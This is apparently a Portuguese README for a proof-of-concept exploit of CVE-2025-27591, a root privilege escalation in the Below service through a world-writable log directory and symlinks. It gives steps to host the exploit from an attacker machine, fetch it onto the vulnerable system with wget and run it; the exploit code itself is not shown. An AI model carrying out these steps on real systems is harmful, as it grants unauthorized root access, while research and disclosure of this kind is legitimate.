
CVE-2025-27591 é uma vulnerabilidade de escalonamento de privilégios que afetou o serviço Below antes da versão 0.9.0
CVE-2025-27591 é uma vulnerabilidade de escalada de privilégio que afetou o serviço Below antes da versão 0.9.0. O problema surgiu devido à criação de um diretório com permissão de escrita global em /var/log/below. Um atacante poderia explorar essa vulnerabilidade manipulando symlinks dentro deste diretório e potencialmente obter privilégios de root, tornando-se uma preocupação significativa de segurança para usuários locais sem privilégios.
Esta Prova de Conceito foi escrita apenas para fins educacionais e de pesquisa.
No momento da escrita, não existia nenhuma PoC publicamente disponível para esta vulnerabilidade na comunidade. Portanto, decidi compartilhar esta implementação de forma responsável para preencher essa lacuna, contribuir para o ecossistema de pesquisa em segurança e aumentar a conscientização sobre a natureza crítica de sistemas de arquivos inseguros.
Da máquina do atacante:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
Do sistema vulnerável:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3